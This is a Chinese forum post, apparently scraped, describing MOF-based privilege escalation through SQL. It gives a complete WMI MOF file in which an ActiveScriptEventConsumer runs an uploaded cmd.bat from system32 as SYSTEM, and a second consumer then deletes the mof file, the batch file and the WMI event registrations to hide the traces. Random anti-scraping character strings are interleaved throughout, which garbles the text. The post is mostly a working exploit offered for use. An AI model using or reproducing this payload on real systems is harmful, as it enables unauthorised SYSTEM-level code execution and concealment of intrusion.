这个sql提权MOF需要运行 system下的文件,不能定义路径。
& [, e+ O. ?% f: U需要将要运行的命令写入到bat上传到system32目录,然后执行。
- M0 |0 |2 E4 P( Q4 E$ _7 b2 d1 v3 N* L) k9 h
这个sql提权MOF需要运行 system下的文件,不能定义路径。+ A* V8 S. D/ n/ B u+ M6 ~+ a
需要将要运行的命令写入到bat上传到system32目录,然后执行。1 H! y: }% l; O: i8 e
7 a" |; X9 `- E& W: |4 }: t' R2 k#pragma j/ V3 Q I( P' q4 B" S% G
namespace("\\\\.\\root\\cimv2")
4 \( `3 }3 n, z" L# H! S! | class) v+ N; e$ V7 I
MyClass547' r' c5 Y1 Q ?, h9 P2 H
{ [key] `6 y7 V7 M) Y t
string
: P7 x: D l& O! {# M' H1 P$ a, K Name;
9 w5 y% r# b+ J };
% p2 k8 r+ |9 s- l class$ \, o9 _5 Q' ]% _& Q
ActiveScriptEventConsumer U$ H. J5 S/ |" S& @
: __EventConsumer { [key]
2 n' c5 j" n0 j" x/ Q string0 a; r" d* w0 y# R. X
Name; [not_null]
3 n; h }% h4 |9 s1 Z% R string1 Q7 n- |. Y# N& h; n' D- I0 _7 h5 [3 t
ScriptingEngine; string
7 v$ ]; J1 x! i% X% u: r* [& q ScriptFileName; [template]7 Q& z4 E: ~0 m- x1 e) J
string
/ z" F8 y% b( \9 g @ ScriptText; uint32 KillTimeout;
4 G% ^) h4 q% F: b$ q7 v, b0 q& m }; instance of __Win32Provider as $P {
5 \5 L7 c4 X" ^- K9 S) X0 ^3 o Name/ y* [- z9 e4 H$ r% E
=3 J9 W( ]: n- @: I ^6 Z4 J
"ActiveScriptEventConsumer"; CLSID =* Q! f2 ]/ Y6 _$ D
"{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";
4 T3 g, h4 p' m& G* r PerUserInitialization
6 w0 z! a# o! ]6 \- i( L7 R# P = TRUE;
5 K; o P" k5 q/ n3 Q( E5 l+ f- t }; instance of __EventConsumerProviderRegistration { Provider
/ X/ V& e5 k7 N/ i0 c% l = $P; ConsumerClassNames
6 N2 N" R! a1 Y2 k =0 J; c2 ]7 I6 B% K! _ d
{"ActiveScriptEventConsumer"};& s! H# M$ K, f W
};5 L. L. A D5 Z0 R" K
Instance of ActiveScriptEventConsumer
- D/ q( k. E) C8 ?1 J as $cons { Name+ K" Q8 n+ c- x+ N7 D: `
=- [/ Z5 D' ?$ j3 ?3 i
"ASEC"; ScriptingEngine/ F' y6 F) F: [) U
=
# B$ e0 v% R" _3 `: k0 [( |' G "JScript"; ScriptText$ n: N( `& Y5 o3 a6 L
=& s7 R+ A( m7 x, `5 v. y# q0 r$ K
"\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};"; };8 h& L: b- C; j0 v
Instance of ActiveScriptEventConsumer
+ {; F: l9 t' A* W: E4 f as $cons2 { Name2 K5 `7 q1 q- S2 j( s, z k
=5 F9 W1 G) u8 S: _. ^& t+ l
"qndASEC"; ScriptingEngine% l }2 D6 D6 z: L0 c4 w9 Z6 @
=0 R0 ~ _; ~9 H: e4 R; u. `
"JScript"; ScriptText0 ^. Q T! Y5 `+ ]# \& y5 |
=, b8 g: U2 l$ \; C. d: P7 ?0 n
"\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";8 _6 K% w7 Z4 s3 ]( g& F" K8 b' _8 ]
}; instance of __EventFilter as $Filt { Name: l- }! r: U: R4 K! B" T9 g, P
=
. F' K: p, i* w/ Q "instfilt"; Query
5 P! ]# [4 U1 e' O/ c =
% k3 l9 O* `5 v' G1 [# Q "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\""; QueryLanguage
6 N9 F* b1 n1 T9 ]# \ =( Q% b" p: a c( H+ H Y
"WQL"; }; instance of __EventFilter as $Filt2 { Name
) H; B# O3 H0 U2 r$ {+ W0 Z =+ T" E% @5 l3 X$ @7 x
"qndfilt"; Query
9 O. C' c3 Z4 `9 n =
6 i* T0 \. I' ]6 O1 w "SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.bat\""; QueryLanguage0 k8 l& a2 ?" E, a& Y
=5 C0 b: k: {7 a$ ]3 Y+ v
"WQL"; }; instance of __FilterToConsumerBinding as $bind { Consumer
% L, }3 l+ q z. [ = $cons; Filter8 v* y, W, E! g) q
= $Filt;& J: I8 f. l2 s* Q
}; instance of __FilterToConsumerBinding as $bind2 { Consumer& F+ O4 H) M- n7 ^0 E3 Y: C8 H
= $cons2; Filter
/ S0 I6 k9 U6 q: t- C" ` = $Filt2;* B+ R) l- D. L8 X- t
}; instance of MyClass547! g4 w# e5 \/ |8 J1 O
as $MyClass { Name
) V9 |( Z# W7 W3 t5 I: h =. A/ B0 u# Q5 r+ ]* R
"ClassConsumer";
+ h: Q" p4 B% J7 E }; |